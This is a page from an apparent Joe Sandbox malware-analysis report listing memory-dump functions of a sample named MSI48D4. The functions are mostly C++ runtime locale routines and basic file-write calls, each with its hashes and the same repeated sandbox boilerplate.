Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: b818fa73e3a0c4365cdc5072f888415aa2e0a4ab459bb884955c0c33ea580726
Instruction ID: edcc5768392ccd41ed676f5196c29715190d94769f71065604e2c45e1a85bf00
Opcode Fuzzy Hash: b818fa73e3a0c4365cdc5072f888415aa2e0a4ab459bb884955c0c33ea580726
Instruction Fuzzy Hash: CFD18A79D002489FCF15CFA8D880AAEBBF5FF49311F18452AE926E7351D730A985CB54

Function 00C30116 Relevance: 6.3, APIs: 4, Instructions: 287COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3011D
collate.LIBCPMT ref: 00C30126

Part of subcall function 00C2EDF2: __EH_prolog3_GS.LIBCMT ref: 00C2EDF9
Part of subcall function 00C2EDF2: __Getcoll.LIBCPMT ref: 00C2EE5D

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

__Getcoll.LIBCPMT ref: 00C3016C
numpunct.LIBCPMT ref: 00C303C4

Part of subcall function 00C16330: LocalAlloc.KERNEL32(00000040,?,00C20E04,00000020,?,?,00C19942,00000000,0EAD22C0,?,?,?,?,00C550DD,000000FF), ref: 00C16336

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
String ID:
API String ID: 259100098-0
Opcode ID: 5c7b7cb43882228d783feb41fb2154b796ad92e0bd75aa962906af0535f932fe
Instruction ID: 0cad4993d9c945e84fa440a4dd84982090dd9992ca2afa8904fe56254662e2f7
Opcode Fuzzy Hash: 5c7b7cb43882228d783feb41fb2154b796ad92e0bd75aa962906af0535f932fe
Instruction Fuzzy Hash: D2912BB2D012116BEB207BB54C52BBF7AA9DF42320F64442DF81AB7291DE704944B7F1

Function 00C35A58 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00C35B1F
___AdjustPointer.LIBCMT ref: 00C35B42
___AdjustPointer.LIBCMT ref: 00C35BDE

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e141a521b685541d5748f21b649ac68b9cf822f83129ef60504591bb7df83d51
Instruction ID: 4f286fe5360a82820a1fd2813544042ef26d36f1eeb48a5c51d89a4c5d4ba561
Opcode Fuzzy Hash: e141a521b685541d5748f21b649ac68b9cf822f83129ef60504591bb7df83d51
Instruction Fuzzy Hash: 6F51F4B2620B06DFDB299F54D881BBAB7A4EF04714F14462DEC1587291E731EE80EB90

Function 00C424E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b204121a5c1bc745f347b3a1ac27c7a6668e36395fec83f49fc0263e38df2b
Instruction ID: 21834811fa4334b21beb6f160c33dc12ec7004815b7ca7a09d659f239a645263
Opcode Fuzzy Hash: e6b204121a5c1bc745f347b3a1ac27c7a6668e36395fec83f49fc0263e38df2b
Instruction Fuzzy Hash: 70219071604205AFDB20AF71DC63DAF77A9FF443A4B904A15FC2597251EB30EE40A7A0

Function 00C16FB0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00C16FB7

Strings

> returned:, xrefs: 00C16FC6
Call to ShellExecute() for verb<, xrefs: 00C16FC1
Last error=, xrefs: 00C17011

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ErrorLast
String ID: > returned:$Call to ShellExecute() for verb<$Last error=
API String ID: 1452528299-1781106413
Opcode ID: 2e16d5cf011e9fedf7eace33a0e4157a99140fdbbe52e1a8541207d8995bf54b
Instruction ID: 589dca0a0c4784a2f5e68deb22b18f7cc83ba39e9dc4651e0b144f7ec9a78aec
Opcode Fuzzy Hash: 2e16d5cf011e9fedf7eace33a0e4157a99140fdbbe52e1a8541207d8995bf54b
Instruction Fuzzy Hash: 4321A159B1036182CB301F789401379A2F0EF59B54F65087FE8D9D7390FAA98CC2D391

Function 00C1F3D9 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C1F3E0
std::_Lockit::_Lockit.LIBCPMT ref: 00C1F3EA
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1F48E
Concurrency::cancel_current_task.LIBCPMT ref: 00C1F499

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
String ID:
API String ID: 4244582100-0
Opcode ID: accdced26d8c3643b4027dc89f43d67917dbaf7ccc2c00425cf076f1b2f80a9e
Instruction ID: 55e3b7ed49a75f9ff8094deac82b0e26d703ce2a3507e0d83eeb635105a7e2ae
Opcode Fuzzy Hash: accdced26d8c3643b4027dc89f43d67917dbaf7ccc2c00425cf076f1b2f80a9e
Instruction Fuzzy Hash: 70218338A0061ADFCB04EF14D851AADB771FF49711F118569E826AB7A1CB70EE91DF80

Function 00C1CCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,0EAD22C0), ref: 00C1CD1C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00C1CD3C
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00C1CD6D
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00C1CD86

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: 249f25661ec4e475a296db8e995ebc3b49a37f388b35207887b326280621f00e
Instruction ID: e93270ff2115b98c7e7c86cb3e9a4379006fc5bfeb82a08703f6cc94c94be45b
Opcode Fuzzy Hash: 249f25661ec4e475a296db8e995ebc3b49a37f388b35207887b326280621f00e
Instruction Fuzzy Hash: A921AF74941314EFD7209F54EC4AFAEBBB8EB45B24F100229F511B72C0D7B46A4487E4

Function 00C222FA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22301
std::_Lockit::_Lockit.LIBCPMT ref: 00C2230B

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C2235C
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2237C

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: b819aeb9cfdf3b1ca08afbcb33f9ac12feb599858436945b84aab2e7bce6ba4a
Instruction ID: 2bc93985b9d266c89f21684ea04b4ad5b62a0dc5e792b8529a1b90a563b2b5a7
Opcode Fuzzy Hash: b819aeb9cfdf3b1ca08afbcb33f9ac12feb599858436945b84aab2e7bce6ba4a
Instruction Fuzzy Hash: 46012675900125DFCB14EB60F8017BE7765AF84710F24050AF411AB2D2DF749F80A7D1

Function 00C1D6BD Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C1D6C4
std::_Lockit::_Lockit.LIBCPMT ref: 00C1D6CE

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C1D71F
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1D73F

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 58961a27dc81bbe56b63d3d36e3bd50061be924f6333ccd9725ecbc995764984
Instruction ID: dde7bfb5231076ef46fd186bff88470d400b6262d159393265aff6d384e2dc7c
Opcode Fuzzy Hash: 58961a27dc81bbe56b63d3d36e3bd50061be924f6333ccd9725ecbc995764984
Instruction Fuzzy Hash: 0301D275900225DFCB15EB60E8517EE77A1BF86710F240509F412AB2D6CF709E81A7D1

Function 00C1D7E7 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C1D7EE
std::_Lockit::_Lockit.LIBCPMT ref: 00C1D7F8

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C1D849
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1D869

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 1c426d3aaa99c2b3176aaff124c524414cea93c825cee58d3374ca2de3e1c5f3
Instruction ID: 6978f55ac1d1be9e8a0a0f7adbc25fa68dc893d2925922a90871a35cd302d4b0
Opcode Fuzzy Hash: 1c426d3aaa99c2b3176aaff124c524414cea93c825cee58d3374ca2de3e1c5f3
Instruction Fuzzy Hash: C401C075D00125DFCB14EB60D8527EE77A1AF85720F240549F412AB2D2DF709E81E792

Function 00C227A2 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C227A9
std::_Lockit::_Lockit.LIBCPMT ref: 00C227B3

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C22804
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22824

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 89268aef4537740b3011cde592c1672c42af85fe0626b7adc6cd986ef43ac7ce
Instruction ID: ede6ec5d71888e85a01c0aef60f57185e6db8658efdc81076969710dcfc9d71d
Opcode Fuzzy Hash: 89268aef4537740b3011cde592c1672c42af85fe0626b7adc6cd986ef43ac7ce
Instruction Fuzzy Hash: 77012236A00225DBCB15EBA0E8117BE7771BF88720F240509F8116B2D3CF708E41E791

Function 00C1D752 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C1D759
std::_Lockit::_Lockit.LIBCPMT ref: 00C1D763

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C1D7B4
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1D7D4

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 992bf8630888c9305afa1f7fffffc5179e806263cc0473a67be7d461b7a332b3
Instruction ID: 7845073f8039d9b31afbc6342096da571bf29902859c4b795857d7d683ace8f6
Opcode Fuzzy Hash: 992bf8630888c9305afa1f7fffffc5179e806263cc0473a67be7d461b7a332b3
Instruction Fuzzy Hash: 9701D275900125DFCB14EB60E8517EE77A1AF85320F240509F812AB2D6DF709E80F7D1

Function 00C2270D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22714
std::_Lockit::_Lockit.LIBCPMT ref: 00C2271E

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C2276F
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2278F

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 18e07b7ad0e4862450afde41869ace03029343a57a7c2909908a203b340de02f
Instruction ID: e50c3a730150923bf54911d738b0d946cae82f22347b243ec0d52073e96c5200
Opcode Fuzzy Hash: 18e07b7ad0e4862450afde41869ace03029343a57a7c2909908a203b340de02f
Instruction Fuzzy Hash: 8201F575904225EFCB14EB60E8557BEB771BF84710F24050AF8116B292CF749F45EB91

Function 00C228CC Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C228D3
std::_Lockit::_Lockit.LIBCPMT ref: 00C228DD

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C2292E
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2294E

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: c8cb56f0c41b547575776a1a4f81544cad618e352b5bad65fc7dfb9d93d2abc3
Instruction ID: 4c22cb5e8131ecfd94f66578d4e19d0f82b69efe88c918191c1f54198d9eadb4
Opcode Fuzzy Hash: c8cb56f0c41b547575776a1a4f81544cad618e352b5bad65fc7dfb9d93d2abc3
Instruction Fuzzy Hash: 2E01D275E00225DBCB14FB64E8617BE77B1AF88720F240509F4116B292CFB49F85EB91

Function 00C22837 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2283E
std::_Lockit::_Lockit.LIBCPMT ref: 00C22848

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C22899
std::_Lockit::~_Lockit.LIBCPMT ref: 00C228B9

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: c7081b638754c320959e654378e4d077df9db726548c38bf3e5a111e40aa5d44
Instruction ID: 1d94d9c273c4803a7fbef7ddf8ba4aa7d574f80809bf5cbfa1fef1cf660a728f
Opcode Fuzzy Hash: c7081b638754c320959e654378e4d077df9db726548c38bf3e5a111e40aa5d44
Instruction Fuzzy Hash: D601C076D00125DBCB14EB64E851BBE77A1BF84720F240509E411AB2D2DF74DE45EB91

Function 00C2E96D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2E974
std::_Lockit::_Lockit.LIBCPMT ref: 00C2E97E

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C2E9CF
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2E9EF

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 7bc45c6b92e0ed8fc9f1396c0bfbbf1884b3cc886c063e0938e60f32fa903062
Instruction ID: 1750a79888be4cc25893bcfbef59255043cb82d94dfca4ef71ca2590561c92c9
Opcode Fuzzy Hash: 7bc45c6b92e0ed8fc9f1396c0bfbbf1884b3cc886c063e0938e60f32fa903062
Instruction Fuzzy Hash: 3501D275910225DBCB15FB64E8117FE77A5AF84310F25050AF4117B292CF709E80EB91

Function 00C2EA02 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2EA09
std::_Lockit::_Lockit.LIBCPMT ref: 00C2EA13

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C2EA64
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2EA84

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: b59a6d815800ec93d177ae39b83af4d7a88aef3345927b5bc5d828c4eb60b8ec
Instruction ID: 0f34b6ff101c1d87254519d68b076b69cbaec7976995333e23ce04675ca8b0e8
Opcode Fuzzy Hash: b59a6d815800ec93d177ae39b83af4d7a88aef3345927b5bc5d828c4eb60b8ec
Instruction Fuzzy Hash: E901D275D00225DFCB14EBA4E8517AE7B61BF84710F290509F4117B292DF709E41E7A1

Function 00C2EBC1 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2EBC8
std::_Lockit::_Lockit.LIBCPMT ref: 00C2EBD2

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C2EC23
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2EC43

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: dd2b48b13f32ecc2b4840fcf844224afccfb466ba15ed10c43321899af57c519
Instruction ID: 09615dc9a5ed7d9f59ba9e9fd0f75cde81a6af8e7508d8cbc59d9a7fdd19c29d
